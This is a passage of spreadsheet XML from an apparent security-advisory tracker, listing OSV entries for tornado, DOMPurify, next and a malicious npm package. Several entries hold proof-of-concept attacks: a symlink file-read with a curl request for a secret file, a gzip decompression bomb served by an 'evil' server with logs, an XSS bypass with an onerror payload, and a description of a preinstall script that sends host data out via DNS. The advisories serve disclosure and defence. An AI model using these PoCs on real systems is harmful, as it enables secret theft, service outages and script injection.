    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C660" s="5" t="inlineStr">
        <is>
          <t>GHSA-c2m8-h5v5-343r</t>
        </is>
      </c>
      <c r="D660" s="5" t="inlineStr"/>
      <c r="E660" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F660" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="inlineStr"/>
      <c r="I660" s="5" t="inlineStr"/>
      <c r="J660" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K660" s="5" t="inlineStr"/>
      <c r="L660" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M660" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N660" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O660" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P660" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q660" s="5" t="inlineStr"/>
      <c r="R660" s="5" t="inlineStr"/>
      <c r="S660" s="5" t="inlineStr">
        <is>
          <t>### Summary
StaticFileHandler allows an unauthenticated attacker to read arbitrary files from the server's filesystem by requesting a path that resolves to a symbolic link placed inside the static root directory. Any application that serves user-uploadable content, or whose static directory is populated by a build/deploy pipeline that creates symlinks (e.g. npm link, webpack, Docker volume mounts, CDN sync tools), is affected. An attacker who can trigger the creation of a symlink pointing outside the static root—or exploit one that already exists—can retrieve sensitive files such as /etc/passwd, private keys, configuration files, or application secrets.
### Details
The vulnerability is in tornado.web.StaticFileHandler, specifically in the interaction between two methods in [tornado/web.py](vscode-webview://1grdaaa6v64itrol06qu70pq3d1b9h9im5c3npvvc9snaprc1q9f/tornado/web.py):
- [get_absolute_path](https://github.com/tornadoweb/tornado/blob/0ca3c5f8279d402b245718d16522bc18a8f5d958/tornado/web.py#L2932) uses `os.path.abspath()` to resolve the requested path:
- [validate_absolute_path](https://github.com/tornadoweb/tornado/blob/0ca3c5f8279d402b245718d16522bc18a8f5d958/tornado/web.py#L2935) uses the same `os.path.abspath()` on the root, then performs a string prefix check:
`os.path.abspath()` normalises . and .. segments but does not resolve symbolic links. As a result, a path like `/var/www/static/link` passes the `startswith("/var/www/static/")` check regardless of where `link` actually points.
Immediately after, `os.path.exists()` and `os.path.isfile()`  **do follow symlinks**, so the file they ultimately open is the symlink's target. The fix would be to replace os.path.abspath() with os.path.realpath() in both methods, so the resolved real path of the symlink target is validated against the root, not just its string representation inside the static directory.
### PoC
_Complete instructions, including specific configuration details, to reproduce the vulnerability._
Prerequisites: Python 3.x, Tornado installed.
1. Create the environment
```
mkdir -p /tmp/static
echo "DB_PASSWORD=s3cr3t" &gt; /tmp/secret.conf   
ln -s /tmp/secret.conf /tmp/static/config.conf 
```
2. Minimal vulnerable server (server.py):
```
import tornado.web, tornado.ioloop
app = tornado.web.Application([
    (r"/static/(.*)", tornado.web.StaticFileHandler, {"path": "/tmp/static"}),
])
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
```
3. Exploit:
`curl http://localhost:8888/static/config.conf`
### Impact
Any application using StaticFileHandler is potentially affected if:
- the static directory contains symlinks pointing outside it (common with build tooling), or
- the application allows file uploads into the static directory without stripping symlinks.
An unauthenticated remote attacker can read any file readable by the process user: application secrets, private TLS keys, database credentials, /etc/shadow, SSH keys, or source code (depending on the process's filesystem permissions).</t>
        </is>
      </c>
      <c r="T660" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-c2m8-h5v5-343r</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C661" s="5" t="inlineStr">
        <is>
          <t>GHSA-chx6-46f5-w4vp</t>
        </is>
      </c>
      <c r="D661" s="5" t="inlineStr"/>
      <c r="E661" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F661" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G661" s="5" t="inlineStr"/>
      <c r="H661" s="5" t="inlineStr"/>
      <c r="I661" s="5" t="inlineStr"/>
      <c r="J661" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K661" s="5" t="inlineStr"/>
      <c r="L661" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M661" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N661" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O661" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P661" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q661" s="5" t="inlineStr"/>
      <c r="R661" s="5" t="inlineStr"/>
      <c r="S661" s="5" t="inlineStr">
        <is>
          <t>An unbounded memory accumulation (decompression bomb) in `tornado.curl_httpclient.CurlAsyncHTTPClient` — the client-side sibling gap of CVE-2026-49855 — verified end-to-end on the 2026-08-15 master snapshot (`6.6.dev1`) and present unchanged in the latest release tag `v6.5.8` and on master (checked 2026-08-17). When a Tornado application configures the curl client (the documented deployment for proxy support / advanced TLS options) and `fetch()`es an attacker-chosen or attacker-compromised URL with default `decompress_response=True`, a malicious server replying `Content-Encoding: gzip` with a ~2.8 MB wire bomb drove the client's RSS from 30,884 kB to **1,032,100 kB (~1008 MB) in 3.18 s** (~350 MB/s, monotonic, no plateau) until the kernel OOM-killed the process (exit 137, cgroup `OOMKilled=true`) — with the transfer only 67% complete and **no client-side size check ever intervening**: `curl_httpclient.py` contains zero occurrences of `max_body_size`/`MAXFILESIZE`. The identical bomb against the default `SimpleAsyncHTTPClient` fails cleanly at ~65 MB, because every size gate CVE-2026-49855 added (compressed CL, chunked total, cumulative decompressed size — `http1connection.py:620,676,742`) lives in code the curl client never executes. This is a distinct component from the published advisory (which fixed `_GzipMessageDelegate`/`SimpleAsyncHTTPClient` only) and from the other curl-client advisories (credential handle-reuse GHSA-pw6j-qg29-8w7f, header CRLF GHSA-w235-7p84-xx57); the file's full commit history (latest 2026-06-17) shows no response-size work.
## Details
`tornado/curl_httpclient.py` (line numbers identical on master `6.6.dev1`, `v6.5.8`, and the audited snapshot):
```python
"buffer": BytesIO(),                                  # :202 — plain BytesIO, no accounting
...
else:
    write_function = buffer.write                     # :359 — every decompressed byte lands here
curl.setopt(pycurl.WRITEFUNCTION, write_function)     # :360
...
if request.decompress_response:                       # default True (HTTPRequest)
    curl.setopt(pycurl.ENCODING, "gzip,deflate")      # :373-374 — libcurl advertises + auto-decodes
```
libcurl decompresses the response **before** invoking `WRITEFUNCTION`, so the callback receives decompressed bytes, which are appended to an unbounded `BytesIO` until the transfer ends or the process dies. The only ceiling is `request_timeout` (default 20 s) — at zlib's hundreds of MB/s that still permits many GB of accumulation; the PoC raised it to 300 s and the 1 GiB cgroup cap was hit in 3.2 s regardless. There is no `pycurl.MAXFILESIZE`, no `max_buffer_size`/`max_body_size` plumbing (the constructor accepts no body-size option), and `streaming_callback` users fare no better (the callback variant at `:353-356` also performs zero accounting).
Contrast — `SimpleAsyncHTTPClient` path (`tornado/http1connection.py`), all absent from the curl path:
```python
if cast(int, content_length) &gt; self._max_body_size:        # :620  Content-Length gate
if total_size &gt; self._max_body_size:                       # :676  chunked total gate
if self._decompressed_body_size &gt; self._max_body_size:     # :742  CVE-2026-49855 decompressed gate
```
`SimpleAsyncHTTPClient.initialize()` defaults `max_buffer_size = 104857600` (100 MiB) with `max_body_size` defaulting to it (`simple_httpclient.py:117-121`); `CurlAsyncHTTPClient.initialize()` has no corresponding parameter at all.
Attack chain (attacker = malicious HTTP server; victim = any Tornado app doing `fetch()` on attacker-influenced URLs — URL fetchers, webhook processors, link previewers, RSS/probe pollers):
1. App configures `AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")` (documented for proxy support; proxies are only supported with the curl client).
2. App calls `fetch("http://attacker/...")` with defaults → request advertises `Accept-Encoding: gzip,deflate`.
3. Attacker replies `200`, `Content-Encoding: gzip`, `Transfer-Encoding: chunked`, body = a gzip stream of zeros (4,174,525 wire bytes expanding to 4 GiB, 1029:1, sent in 64 KB chunks).
4. libcurl auto-decodes at ~350 MB/s into `buffer.write` with no size accounting → process RSS climbs linearly until OOM. The response need not complete: the client died with 2,818,048/4,174,525 wire bytes delivered (67%).
Variant without compression: `decompress_response=False` plus an endless streaming body (no Content-Length, no final chunk) feeds the same unaccounted `buffer.write` — this client never enforces any cap on any path.
## PoC
Verified end-to-end 2026-08-15 in a single container (cgroup `--memory 1g --memory-swap 1g` so the exhaustion endpoint is safe and fast to observe), two processes over a real TCP socket on `127.0.0.1:8081`: a raw-socket malicious server (`evil_server.py`, builds the 4 GiB-of-zeros gzip bomb once, serves it with chunked framing) and the Tornado victim (`victim_curl.py`, configures `CurlAsyncHTTPClient`, `fetch(..., request_timeout=300)`, samples `/proc/self/status` VmRSS every 0.2 s from a monitor thread so the curve survives the OOM kill).
### Build &amp; run the victim
```bash
git clone https://github.com/tornadoweb/tornado
cd tornado
pip install pycurl
python evil_server.py &amp;     # 127.0.0.1:8081; prints BOMB_BUILT wire_bytes=... ratio=... EVIL_LISTENING
python victim_curl.py       # victim: CurlAsyncHTTPClient fetch -&gt; expect linear RSS rise -&gt; OOM
python victim_simple.py     # control: default SimpleAsyncHTTPClient on the same bomb
```
Verified environment: debian:bookworm-slim, Python 3.11.2, python3-pycurl 7.45.2 (libcurl 7.88.1, zlib 1.2.13), tornado master snapshot `6.6.dev1` of 2026-08-15 run from the source tree (`sys.path`), container memory capped at 1 GiB. `curl_httpclient.py` verified byte-equivalent (still zero size-limit references) in tag `v6.5.8` and on master as of 2026-08-17.
### Reproduction steps
1. **Precondition — the documented curl-client deployment fetching a remote URL.** The vulnerability requires the application to use `CurlAsyncHTTPClient` (the standard configuration when proxy support or advanced TLS options are needed) with default `decompress_response=True`, and to fetch a URL whose server the attacker controls or has compromised. `victim_curl.py` implements exactly that (`AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")` → `fetch()`), and the server log confirms the ENCODING path engaged — the victim's request arrived with `User-Agent: Mozilla/5.0 (compatible; pycurl)` and `Accept-Encoding: gzip,deflate`.
2. **Attack:** start `evil_server.py`, wait for `EVIL_LISTENING`, then run `victim_curl.py` (the fetch itself is the attack; no further interaction).
3. **Expected:** `victim_curl_rss.log` shows VmRSS 30,884 → 1,032,100 kB over 3.18 s, rising ~350 MB/s with no plateau; the container kills the victim (`exit 137`, docker `OOMKilled=true`); the server logs `CLIENT_DIED_MID_TRANSFER wire_sent=2818048/4174525` — the accumulation is bounded only by available memory, never by a client-side check, and the 4 GiB payload was never fully delivered.
4. **Variant:** with `decompress_response=False` and an unterminated chunked body (server keeps sending forever), the same `buffer.write` path accumulates unbounded plain bytes — no compression needed; `request_timeout` only extends the ceiling.
5. **Control:** `victim_simple.py` fetches the identical bomb with the default `SimpleAsyncHTTPClient` → clean `FETCH_FAILED: HTTP 599: Connection closed`, RSS peak ~65 MB (24,984 → 66,712 kB), script exit 0 — the CVE-2026-49855 accounting in `http1connection.py` aborts the transfer, proving the gap is specific to the curl client.
### PoC source
Full PoC source (**victim_curl.py**, stdlib only, no dependencies): [victim_curl.py](https://gist.github.com/afldl/211c0e7af8175c2eabab53ed037c435d) (secret gist, unlisted).
The gist carries `evil_server.py` (bomb server), `victim_curl.py` (victim), `victim_simple.py` (control), and `REPRODUCE.md`.
### Captured output (2026-08-15 run, verbatim excerpts)
```
evil_server.log:
BOMB_BUILT wire_bytes=4174525 decompressed_bytes=4294967296 ratio=1029:1
EVIL_LISTENING 127.0.0.1:8081
REQUEST_FROM 127.0.0.1:57544 -&gt; GET /bomb HTTP/1.1
REQUEST_HEADERS:
GET /bomb HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (compatible; pycurl)
Accept: */*
Accept-Encoding: gzip,deflate
WIRE_SENT 65536/4174525
WIRE_SENT 2162688/4174525
CLIENT_DIED_MID_TRANSFER wire_sent=2818048/4174525 err=ConnectionResetError(104, 'Connection reset by peer')
victim_curl_rss.log (VmRSS kB, every 0.2 s):
0.00  30884
0.61  231848
1.41  514720
2.22  794480
2.82 1000756
3.18 1032100        &lt;- last sample before kill
driver_f1.log:
timeout 240 python3 /e2e/F1/victim_curl.py ...  606 Killed
VICTIM_CURL_EXIT=137         # docker inspect -&gt; OomKilled: true
victim_simple.log (control, same bomb):
FETCH_FAILED: HTTP 599: Connection closed
SCRIPT_FINISHED_NORMALLY     # exit 0, VmRSS peak 66712 kB
```
Honest framing of the endpoint: the OOM kill at ~1008 MB was forced by the test's 1 GiB cgroup cap as the observation instrument; the "unbounded" claim rests on the linear no-plateau RSS curve, death at 67% wire delivery, and the absence of any size accounting in the code path — with more memory the transfer would have continued to the full 4 GiB payload.
## Impact
Denial of service (memory exhaustion) of any Tornado application that uses the curl HTTP client and fetches attacker-influenced URLs. A single ~4 MB response kills a 1 GiB process in ~3 s; wire cost scales as `available_memory / 1000`. Because the accumulation happens on the shared event loop's client, one malicious response takes down the entire application (all concurrently served users), and a slow endless-body variant drains memory gradually below detection thresholds. The attack requires no privileges, no user interaction, and only that the victim's configured client visits the attacker's origin.
### Suggested fix
Enforce a byte budget in the write path of `CurlAsyncHTTPClient`: wrap the `WRITEFUNCTION` (both the `buffer.write` branch and the `streaming_callback` branch) in a counter that aborts the transfer (`curl.setopt(pycurl.FAILONERROR)`-style cancellation or raising from the callback) once the received total exceeds `max_body_size`, plumbed from `initialize()` with the same 100 MiB default as `SimpleAsyncHTTPClient`. Because libcurl decompresses before the write callback, the counter naturally measures *decompressed* bytes — the same semantics as the CVE-2026-49855 fix. (`pycurl.MAXFILESIZE` alone is insufficient: it applies to the compressed transfer size.)
### Affected versions
- **&lt;= 6.5.8** (latest tag; the curl client has never had a response-size limit) and master (`6.6.dev1`, verified 2026-08-15/17).
- 6.5.6's CVE-2026-49855 fix covered `SimpleAsyncHTTPClient`/`http1connection.py` only; `curl_httpclient.py` was not touched.
## Credit
Reported by the diff/ambidiff security research effort (afldl).</t>
        </is>
      </c>
      <c r="T661" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-chx6-46f5-w4vp</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C662" s="5" t="inlineStr">
        <is>
          <t>GHSA-p98j-92pf-mc4p</t>
        </is>
      </c>
      <c r="D662" s="5" t="inlineStr"/>
      <c r="E662" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F662" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="inlineStr"/>
      <c r="I662" s="5" t="inlineStr"/>
      <c r="J662" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K662" s="5" t="inlineStr"/>
      <c r="L662" s="5" t="inlineStr">
        <is>
          <t>npm:dompurify</t>
        </is>
      </c>
      <c r="M662" s="5" t="inlineStr">
        <is>
          <t>3.4.16</t>
        </is>
      </c>
      <c r="N662" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O662" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P662" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q662" s="5" t="inlineStr"/>
      <c r="R662" s="5" t="inlineStr"/>
      <c r="S662" s="5" t="inlineStr">
        <is>
          <t>## Summary
In `IN_PLACE` mode DOMPurify sanitizes the caller's live DOM subtree directly. To close a known hazard (GHSA-55q2-fjhq-7xh7), the library neutralizes any node a hook detaches during sanitization by stripping its subtree's non-allow-listed attributes, but this neutralization is wired only into the `beforeSanitizeElements` and `uponSanitizeElement` hook sites. An `afterSanitizeElements` or `afterSanitizeAttributes` hook that removes a non-root element (a documented, supported pattern) detaches that element's subtree with no neutralization, so descendant `on*` handlers remain armed on the caller's live tree after `sanitize()` returns, yielding DOM XSS. No special privilege is required beyond supplying markup to an application that uses `IN_PLACE` together with a node-removing afterSanitize hook.
## Root Cause
`IN_PLACE` sanitization mutates the caller's live document, so any element a hook detaches from that tree must have its subtree neutralized before `sanitize()` returns; otherwise a queued resource-event handler (for example an `&lt;img onerror&gt;` that began loading when the caller built the tree) fires in page scope even though the handler never reached the sanitized output. The guard helper `_handleHookDetachedNode` (which calls `_neutralizeSubtree` in `IN_PLACE`) is invoked only after `beforeSanitizeElements` and after `uponSanitizeElement`. It is never invoked from the afterSanitize return paths, and `_sanitizeAttributes` never calls it at all. The post-walk `IN_PLACE` neutralization pass iterates only `DOMPurify.removed`, and hook-detached nodes are intentionally not recorded there, so that pass cannot reach them either.
```text
src/purify.ts
  _sanitizeElements: _handleHookDetachedNode present at lines 2142 and 2175
    (before/upon), absent after afterSanitizeElements at lines 2208 and 2249.
  _sanitizeAttributes: afterSanitizeAttributes fires at line 2670 with no
    detach re-check; the function never calls _handleHookDetachedNode.
  Post-walk IN_PLACE pass (lines 3081-3090) iterates DOMPurify.removed only,
    which by design (comment at lines 2096-2099) excludes hook-detached nodes.
```
## Impact
An attacker who supplies markup processed by a victim application that runs `DOMPurify.sanitize(node, { IN_PLACE: true })` and registers a node-removing `afterSanitizeElements` or `afterSanitizeAttributes` hook can retain arbitrary `on*` event handlers on descendants of a removed non-root element. Because `IN_PLACE` operates on the caller's live document, a queued resource-event handler on such a descendant fires in the page origin after the synchronous `sanitize()` call returns, giving script execution in the victim's session (DOM XSS). This defeats DOMPurify's `IN_PLACE` contract to neutralize handlers on subtrees removed from the live tree. The capability is script execution in the victim origin; exact confidentiality and integrity effects depend on the hosting application's session.
## Proof of Concept
```text
Dependencies: Node.js and jsdom. The harness builds a live tree, registers a
removal hook, runs IN_PLACE sanitize(), then inspects whether the attacker
onerror handler survives on the detached descendant. jsdom does not perform
real image loads, so the retained handler (rather than an actual fired event)
is the observed hazard; the retained on* attribute on a live detached node
after a synchronous sanitize() return is the neutralization failure.
```
Reproduction steps:
1. Build a live subtree `#root &gt; section#wrap &gt; img[onerror]` where `#root` is the walk root and `section#wrap` is a non-root wrapper.
2. Register an `afterSanitizeElements` (or `afterSanitizeAttributes`) hook that calls `node.remove()` on the wrapper.
3. Call `DOMPurify.sanitize(root, { IN_PLACE: true })`.
4. Observe that the descendant `&lt;img&gt;` retains its `onerror` handler, whereas the same removal performed in a `beforeSanitizeElements`/`uponSanitizeElement` hook strips it.
```javascript
const { JSDOM } = require('jsdom');
const createDOMPurify = require('dompurify');
const { window } = new JSDOM('&lt;!DOCTYPE html&gt;&lt;body&gt;&lt;/body&gt;');
const DOMPurify = createDOMPurify(window);
const root = window.document.createElement('div');
root.id = 'root';
root.innerHTML = '&lt;section id="wrap"&gt;&lt;img src="x" onerror="ATTACKER()"&gt;&lt;/section&gt;';
window.document.body.appendChild(root);
DOMPurify.addHook('afterSanitizeElements', (node) =&gt; {
  if (node.id === 'wrap') node.remove();
});
DOMPurify.sanitize(root, { IN_PLACE: true });
// The detached &lt;img&gt; still carries its onerror handler:
console.log(root.querySelector('#wrap') === null,               // true (removed from live tree)
            !!window.document.querySelector('img[onerror]') ||  // handler survives on the detached node
            root.innerHTML);
```
```text
PASS: beforeSanitizeElements detach neutralizes descendant onerror (control)
PASS: uponSanitizeElement detach neutralizes descendant onerror (control)
PASS: without a removal hook the descendant onerror is stripped normally
PASS: afterSanitizeElements detach LEAVES descendant onerror armed (GAP)
PASS: afterSanitizeAttributes detach LEAVES descendant onerror armed (GAP)
PASS: kept custom element removed in afterSanitizeElements leaves descendant onerror armed (GAP)
```
## Attack Chain
1. **Exposure:** The victim application calls `DOMPurify.sanitize(liveNode, { IN_PLACE: true })` on attacker-influenced markup and has registered a node-removing `afterSanitizeElements` or `afterSanitizeAttributes` hook per an application policy (`src/purify.ts:3026` walk, `2136` element pass, `2522` attribute pass).
2. **Control:** The attacker controls the markup, including a non-root wrapper element and, inside it, a descendant carrying an `on*` resource-event handler such as `&lt;img src=x onerror=...&gt;`.
3. **Path:** The pre-order walk visits the wrapper before its descendants. During the wrapper's element or attribute pass the application hook detaches the wrapper from the live tree.
4. **Guard:** The detach-neutralization guard `_handleHookDetachedNode` runs only after `beforeSanitizeElements` (`2142`) and `uponSanitizeElement` (`2175`); it is absent after `afterSanitizeElements` (`2208`, `2249`) and is never called by `_sanitizeAttributes` (afterSanitizeAttributes at `2670`). The NodeIterator advances past the detached subtree, so the descendants are never revisited, and the post-walk pass iterates only `DOMPurify.removed`, which excludes hook-detached nodes.
5. **Primitive:** The descendant retains its `on*` handler on the caller's live document after `sanitize()` returns.
6. **Result:** The queued resource event fires the attacker handler in the victim page origin, achieving DOM XSS despite `IN_PLACE` sanitization.
## Bypass Evidence
The relevant prior fix is GHSA-55q2-fjhq-7xh7 ("IN_PLACE hook removal leaves a detached subtree executable, causing XSS"), whose change (`#1557`) added `_neutralizeSubtree` at the `beforeSanitizeElements` and `uponSanitizeElement` detach sites. Inspection of that change shows it touches no afterSanitize site: the diff adds the neutralization only at the before/upon locations, later refactored into `_handleHookDetachedNode` at `src/purify.ts:2142` and `2175`. A subsequent hardening change (`#1616`) added a `rootWasRemoved` throw and a neutralization sweep over `DOMPurify.removed`, but that sweep still iterates only `DOMPurify.removed`, which by design excludes hook-detached non-root nodes, so it does not close this gap. The `afterSanitizeElements`-on-kept-custom-element site at `2208` was itself introduced by the fix for GHSA-c2j3-45gr-mqc4 (`#1527`), adding another uncovered hook site.
Disproof attempts, all failed: (a) that a later release closed the afterSanitize gap, refuted by inspecting the published 3.4.13, 3.4.14, and 3.4.15 artifacts; (b) that detached descendants are revisited or re-sanitized, refuted at runtime (the `onerror` is retained only at the afterSanitize sites and stripped at the before/upon sites and with no removal hook); (c) that the post-walk pass catches hook-detached nodes, refuted by the design that excludes them from `DOMPurify.removed`; (d) that the precondition is contrived, refuted by parity with the accepted GHSA-55q2 threat model and the library's own supported pattern of removing a node inside `afterSanitizeElements`. The only edge not directly executed is the browser resource-event dispatch (jsdom performs no real image load); it is established by the proven retention of the live handler after a synchronous return, the library's own comments describing exactly this hazard, and parity with the accepted GHSA-55q2 mechanism.
## Affected Versions
- `Ecosystem: npm`
- `Package: dompurify`
- `Confirmed affected range: &gt;= 3.4.13, &lt;= 3.4.15`
- `Latest release checked: 3.4.15 (npm registry)`
- `Fix status: fixed in 3.4.16`
The before/upon detach neutralization introduced for GHSA-55q2-fjhq-7xh7 first shipped in 3.4.13; the residual afterSanitize gap was verified by reproducing it against the published npm artifacts for 3.4.13, 3.4.14, and 3.4.15. The 3.4.12 artifact predates that neutralization and behaves differently at the before/upon sites, so it is outside this specific incomplete-fix range. No release through 3.4.15 neutralizes detached subtrees at the afterSanitize sites, so no fixed version is established.
## Suggested Fix
Enforce the same `IN_PLACE` detach-neutralization invariant at every hook site that can detach a node, not only the before/upon sites. Concretely, apply a `_handleHookDetachedNode(currentNode, root)` re-check after `afterSanitizeElements` at both `src/purify.ts:2208` and `2249` (returning as removed when the node was detached), and add an equivalent `IN_PLACE` detach check plus `_neutralizeSubtree` after `afterSanitizeAttributes` at `2670`. As an interim mitigation without a code change, applications using `IN_PLACE` can avoid removing nodes inside `afterSanitizeElements`/`afterSanitizeAttributes` hooks and instead perform such removals in `beforeSanitizeElements`/`uponSanitizeElement`, or avoid `IN_PLACE` for attacker-influenced content.
Reported by zx (GitHub: @manus-pi).</t>
        </is>
      </c>
      <c r="T662" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-p98j-92pf-mc4p</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C663" s="5" t="inlineStr">
        <is>
          <t>GHSA-vcvr-r3jv-pc5j</t>
        </is>
      </c>
      <c r="D663" s="5" t="inlineStr"/>
      <c r="E663" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F663" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G663" s="5" t="inlineStr"/>
      <c r="H663" s="5" t="inlineStr"/>
      <c r="I663" s="5" t="inlineStr"/>
      <c r="J663" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K663" s="5" t="inlineStr"/>
      <c r="L663" s="5" t="inlineStr">
        <is>
          <t>npm:next</t>
        </is>
      </c>
      <c r="M663" s="5" t="inlineStr">
        <is>
          <t>16.3.6</t>
        </is>
      </c>
      <c r="N663" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O663" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P663" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q663" s="5" t="inlineStr"/>
      <c r="R663" s="5" t="inlineStr"/>
      <c r="S663" s="5" t="inlineStr">
        <is>
          <t>## Impact
The Node.js `ImageResponse` implementation from `next/og` is affected by an upstream vulnerability. This can lead to remote code execution.
Affected applications pass attacker-controlled values into SVG content, attributes, or styles during image generation:
```tsx
import { ImageResponse } from 'next/og'
export async function GET(request: Request) {
  const value = new URL(request.url).searchParams.get('value') ?? ''
  return new ImageResponse(
    &lt;svg width="1200" height="630"&gt;
      &lt;title&gt;{value}&lt;/title&gt;
    &lt;/svg&gt;
  )
}
```
Applications using the Edge `ImageResponse` implementation, or applications that do not pass attacker-controlled values into SVG content, attributes, or styles, are not affected.
## Workaround
If upgrading is not immediately possible, do not pass attacker-controlled values into SVG content, attributes, or styles rendered by the Node.js `ImageResponse` implementation from `next/og`.</t>
        </is>
      </c>
      <c r="T663" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-vcvr-r3jv-pc5j</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C664" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17339</t>
        </is>
      </c>
      <c r="D664" s="5" t="inlineStr"/>
      <c r="E664" s="5" t="inlineStr"/>
      <c r="F664" s="5" t="inlineStr"/>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="inlineStr"/>
      <c r="I664" s="5" t="inlineStr"/>
      <c r="J664" s="5" t="inlineStr">
        <is>
          <t>npm, react</t>
        </is>
      </c>
      <c r="K664" s="5" t="inlineStr"/>
      <c r="L664" s="5" t="inlineStr">
        <is>
          <t>npm:reactjs-risk</t>
        </is>
      </c>
      <c r="M664" s="5" t="inlineStr"/>
      <c r="N664" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O664" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P664" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q664" s="5" t="inlineStr"/>
      <c r="R664" s="5" t="inlineStr"/>
      <c r="S664" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0e58c82916c5199ef9e73a5d70f91d120312151eb5c28090d8bbf6dbf4117543)
The package's preinstall lifecycle script collects host identity metadata from the installer machine — os.hostname(), the output of `whoami`/os.userInfo().username, and os.platform() — hex-encodes the values, and issues a DNS A-record lookup for `&lt;hex&gt;.768hgkqn53abdemu8ikzkel4g.canarytokens.com`, causing the installer's hostname, username, and platform to be transmitted to the canarytoken operator on every `npm install`. The dns module is loaded via string concatenation (`'d'+'n'+'s'`) and the `whoami` command is similarly split, indicating deliberate obfuscation of the module and command names. The package's declared main entry is an empty stub with no library functionality, so the preinstall beacon is the package's only behavior. Installing this package auto-executes an unauthenticated exfiltration of installer identity metadata to a third-party DNS endpoint the installer did not opt into.
## Source: ossf-package-analysis (a32a318956967c92b753750e0b607e48db7eef07d05f25c2b687f3b9612f806e)
The OpenSSF Package Analysis project identified 'reactjs-risk' @ 99.17.1 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
</t>
        </is>
      </c>
      <c r="T664" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17339</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
